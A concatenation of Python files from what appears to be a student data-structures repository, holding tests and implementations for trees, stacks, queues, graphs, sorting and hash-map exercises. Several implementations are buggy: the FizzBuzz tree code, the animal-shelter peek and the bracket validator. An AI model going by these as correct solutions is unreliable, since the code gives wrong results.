actual = tree.root.right.value
expected = 7
assert actual == expected
def test_add_lesser_then_in_between():
tree = BinarySearchTree()
tree.add(5)
tree.add(2)
tree.add(3)
actual = tree.root.left.right.value
expected = 3
assert actual == expected
def test_add_greater_then_in_between():
tree = BinarySearchTree()
tree.add(5)
tree.add(10)
tree.add(7)
actual = tree.root.right.left.value
expected = 7
assert actual == expected
def test_bst_contains():
tree = BinarySearchTree()
tree.add(5)
tree.add(10)
tree.add(6)
tree.add(7)
actual = tree.contains(7)
expected = True
assert actual == expected
def test_pre_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.pre_order()
expected = [50, 25, 20, 40, 75, 80]
assert actual == expected
def test_in_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.in_order()
expected = [20, 25, 40, 50, 75, 80]
assert actual == expected
def test_post_order():
tree = BinarySearchTree()
tree.add(50)
tree.add(25)
tree.add(75)
tree.add(20)
tree.add(80)
tree.add(40)
"""
50
25 75
20 40 80
"""
actual = tree.post_order()
expected = [20, 40, 25, 80, 75, 50]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/multi_bracket_validation/multi_bracket_validation.py | <gh_stars>0
def multi_bracket_validation(input):
curly = 0
square = 0
parens = 0
lst1=[]
lst1[:0]=input
for i in lst1:
if i == "{":
curly += 1
if i == "}":
curly -= 1
if curly < 0:
return False
if i == "[":
square += 1
if i == "]":
square -= 1
if square < 0:
return False
if i == "(":
parens += 1
if i == ")":
parens -= 1
if parens < 0:
return False
if curly or parens or square != 0:
return False
else:
return True
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_insertion_sort.py | <filename>python/tests/test_insertion_sort.py
from code_challenges.insertion_sort.insertion_sort import insertion_sort
def test_insertion_sort_one():
list = [1,6,3,8,66,23,]
actual = [1,3,6,8,23,66]
expected = insertion_sort(list)
assert actual == expected
def test_insertion_sorting1():
actual = insertion_sort([20, 18, 12, 8, 5, -2])
expected = [-2, 5, 8, 12, 18, 20]
assert actual == expected
def test_insertion_sorting2():
actual = insertion_sort([5, 12, 7, 5, 5, 7])
expected = [5, 5, 5, 7, 7, 12]
assert actual == expected
def test_insertion_sorting3():
actual = insertion_sort([2, 3, 5, 7, 13, 11])
expected = [2, 3, 5, 7, 11, 13]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/fifo_animal_shelter/fifo_animal_shelter.py | <reponame>everydaytimmy/data-structures-and-algorithms<filename>python/code_challenges/fifo_animal_shelter/fifo_animal_shelter.py
from collections import deque
class Queue(deque):
def enqueue(self, value):
self.append(value)
def dequeue(self):
return self.popleft()
def is_empty(self):
return len(self) == 0
def peek(self):
return [0]
class AnimalShelter:
def __init__(self):
self.cats = Queue()
self.dogs = Queue()
def enqueue(self, animal):
if isinstance(animal, Dog):
self.dogs.enqueue(animal)
else:
self.cats.enqueue(animal)
def dequeue(self, pref):
if pref == "dog" and self.dogs:
return self.dogs.dequeue()
if pref == "cat" and self.cats:
return self.cats.dequeue()
return None
class Cat:
pass
class Dog:
pass
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/fizzbuzz_tree/fizzbuzz_tree.py |
class Node:
def __init__(self, value):
self.value = value
self.children = []
class Ktree():
def __init__(self):
self.root = None
@staticmethod
def breadth(tree = None):
list = []
queue = Queue()
queue.enqueue(tree.root)
if not tree:
return []
while queue.peek():
node = queue.dequeue()
list.append(node.value)
if node.left:
queue.enqueue(node.left)
if node.right:
queue.enqueue(node.right)
return list
def fizz_buzz(tree):
queue = Queue()
queue.enqueue(tree.root)
new_tree = KTree()
while queue.peek():
node = queue.dequeue()
new_value = fizzify(node)
new_node = Node(new_value)
for child in node.children:
queue.enqueue(child)
def fizzify(value):
if value % 3 == 0 or value % 5 == 0:
return "fizzbuzz"
if value % 3 == 0:
return "fizz"
if value % 5 == 0:
return "buzz"
else:
return str(value)
class Queue:
def __init__ (self):
self.front = None
self.rear = None
def enqueue(self, value):
if self.front is None:
self.front = self.back = QNode(value)
else:
self.back.next = QNode(value)
def dequeue(self):
if self.front is None:
return
ret = self.front.value
self.front = self.front.next
return ret
def is_empty(self):
return self.front is None
def peek(self):
if self.front:
return self.front.value
class QNode:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_tree_intersection/hashmap_tree_intersection.py | from code_challenges.tree.tree import BinarySearchTree
def tree_intersection(tree1, tree2):
list1 = BinarySearchTree.pre_order(tree1)
answer_key = []
for i in list1:
if tree2.contains(i):
answer_key.append(i)
return answer_key
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_queue_stack.py | from code_challenges.queueWithStacks.queueWithStacks import Stack, Node
def test_is_stack():
assert Stack()
def test_pop():
stack = Stack()
stack.enqueue('Dwight')
stack.enqueue('Michael')
stack.enqueue('Pam')
stack.enqueue('Jim')
stack.enqueue('Andy')
stack.dequeue()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_pop1():
stack = Stack()
stack.enqueue('Dwight')
stack.enqueue('Michael')
stack.enqueue('Pam')
stack.enqueue('Jim')
stack.enqueue('Andy')
stack.enqueue('Creed')
stack.dequeue()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_push():
stack = Stack()
stack.enqueue('Dwight')
actual = stack.top.value
expected = 'Dwight'
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_graphs.py | from code_challenges.graph.graph import Graph, Vertex
def test_add_node():
graph = Graph()
expected_value = 'noodle'
actual = graph.add_node('noodle')
assert actual.value == expected_value
def test_get_nodes():
graph = Graph()
graph.add_node("pizza")
actual = graph.get_nodes()
expected = 1
assert len(actual) == expected
assert isinstance(actual[0], Vertex)
assert actual[0].value == "pizza"
def test_size_graph():
graph = Graph()
graph.add_node("horse")
graph.add_node("lamb")
actual = graph.size()
expected = 2
assert actual == expected
# def test_get_neighbors():
# graph = Graph()
# vertex1 = graph.add_node('Chicken')
# vertex2 = graph.add_node('Egg')
# graph.add_edge(vertex1, vertex2, 5)
# neighbors = graph.get_neighbors(vertex1)
# assert len(neighbors) == 1
# single_edge = neighbors[0]
# assert single_edge.vertex.value == 'Egg'
# assert single_edge.weight == 5
def test_get_neighbors():
graph = Graph()
eggs = graph.add_node('eggs')
chicken = graph.add_node('chicken')
graph.add_edge(eggs, chicken, 10)
neighbors = graph.get_neighbors(eggs)
assert chicken in neighbors
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/graph_business_trip/graph_business_trip.py | from code_challenges.graph.graph import Graph, Vertex
def business_trip(graph, arr_cities):
if not graph.adjacency_list:
return False, 0
cost = 0
for i,city in enumerate(arr_cities):
neighbors = graph.get_neighbors(city)
if i+1 >=len(arr_cities):
return True, cost
if arr_cities[i+1] in neighbors:
cost += graph.adjacency_list[city].get(arr_cities[i+1])
continue
return False, 0
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_max_binary_tree.py | from code_challenges.find_maximum_binary_tree.find_maximum_binary_tree import Node, BinaryTree, BinarySearchTree
def test_node_has_value():
node = Node("apple")
assert node.value == "apple"
def test_create_binary_tree():
tree = BinaryTree()
assert tree
def test_max_value():
tree = BinarySearchTree()
tree.add(5)
tree.add(20)
tree.add(3)
tree.add(45)
tree.add(50)
tree.add(-1)
actual = tree.max()
expected = 50
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/tree/tree.py | class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinaryTree:
def __init__(self):
self.root = None
class BinarySearchTree(BinaryTree):
def add(self, value):
node = Node(value)
def walk(root, new_node):
if not root:
return
new_value = new_node.value
if new_value < root.value:
if root.left:
walk(root.left, new_node)
else:
root.left = new_node
else:
if root.right:
walk(root.right, new_node)
else:
root.right = new_node
if not self.root:
self.root = node
return
walk(self.root, node)
def contains(self, value):
def walk(root, value):
if not root:
return False
return (root.value == value or walk(root.left, value) or walk(root.right, value))
return walk(self.root, value)
def pre_order(self):
def walk(root, collection):
if not root:
return
collection.append(root.value)
walk(root.left, collection)
walk(root.right, collection)
collected_values = []
walk(self.root, collected_values)
return collected_values
def in_order(self):
def walk(root, collection):
if not root:
return
walk(root.left, collection)
collection.append(root.value)
walk(root.right, collection)
collected_values = []
walk(self.root, collected_values)
return collected_values
def post_order(self):
def walk(root, collection):
if not root:
return
walk(root.left, collection)
walk(root.right, collection)
collection.append(root.value)
collected_values = []
walk(self.root, collected_values)
return collected_values
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_stacks_queues.py | <reponame>everydaytimmy/data-structures-and-algorithms
import pytest
from code_challenges.stacks_and_queues.stacks_and_queues import Stack, Queue, Node
from code_challenges.stacks_and_queues.invalid_error import InvalidOperationError
def test_is_stack():
assert Stack()
def test_push():
stack = Stack()
stack.push('Dwight')
actual = stack.top.value
expected = 'Dwight'
assert actual == expected
def test_push_many():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
actual = stack.top.value
expected = 'Jim'
assert actual == expected
def test_pop():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.pop()
actual = stack.top.value
expected = 'Michael'
assert actual == expected
def test_pop_till_empty():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.pop()
stack.pop()
stack.pop()
actual = stack.is_empty()
expected = True
assert actual == expected
def test_peek():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.push('Andy')
stack.peek()
actual = stack.top.next.value
expected = 'Jim'
assert actual == expected
def test_peek():
stack = Stack()
stack.push('Dwight')
stack.push('Michael')
stack.push('Jim')
stack.push('Andy')
stack.peek()
actual = stack.top.value
expected = 'Andy'
assert actual == expected
def test_empty_stack():
stack = Stack()
assert stack.is_empty()
def test_pop_on_empty():
new_stack = Stack()
with pytest.raises(InvalidOperationError) as e:
new_stack.pop()
assert str(e.value) == "Method not allowed on empty collection"
def test_peek_on_empty():
new_stack = Stack()
with pytest.raises(InvalidOperationError) as e:
new_stack.peek()
def test_enqueue():
queue = Queue()
queue.enqueue('Ron')
actual = queue.rear.value
expected = 'Ron'
assert actual == expected
def test_enqueue_multiple():
queue = Queue()
queue.enqueue('Ron')
queue.enqueue('Andy')
queue.enqueue('Leslie')
actual = queue.rear.value
expected = 'Leslie'
assert actual == expected
def test_dequeue():
queue = Queue()
queue.enqueue('Dennis')
queue.enqueue('Mac')
queue.enqueue('Charlie')
queue.enqueue('Dee')
queue.dequeue()
actual = queue.front.value
expected = 'Mac'
assert actual == expected
def test_dequeue_empty():
queue = Queue()
queue.enqueue('Dennis')
queue.enqueue('Mac')
queue.enqueue('Charlie')
queue.enqueue('Dee')
queue.dequeue()
queue.dequeue()
queue.dequeue()
queue.dequeue()
actual = queue.is_empty()
expected = True
assert actual == expected
def test_new_queue():
queue = Queue()
actual = queue.is_empty()
expected = True
assert actual == expected
def test_call_dequeue_on_empty_queue():
new_queue = Queue()
with pytest.raises(InvalidOperationError) as e:
new_queue.dequeue()
assert str(e.value) == "Method not allowed on empty collection"
def test_peek_on_empty_queue():
new_queue = Queue()
with pytest.raises(InvalidOperationError) as e:
new_queue.peek()
assert str(e.value) == "Method not allowed on empty collection"
# Write tests to prove the following functionality:
# Can successfully peek into a queue, seeing the expected value
# Can successfully empty a queue after multiple dequeues
# Can successfully instantiate an empty queue
# Calling dequeue or peek on empty queue raises exception
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_repeated/hashmap_repeated.py | from code_challenges.hashtable.hashtable import Hashtable
def word_repeat(string):
words = string.replace(',', '').replace('.', '').split(" ")
ht = Hashtable()
for word in words:
word = word.lower()
if ht.contains(word):
return word
else:
ht.add(word, word)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.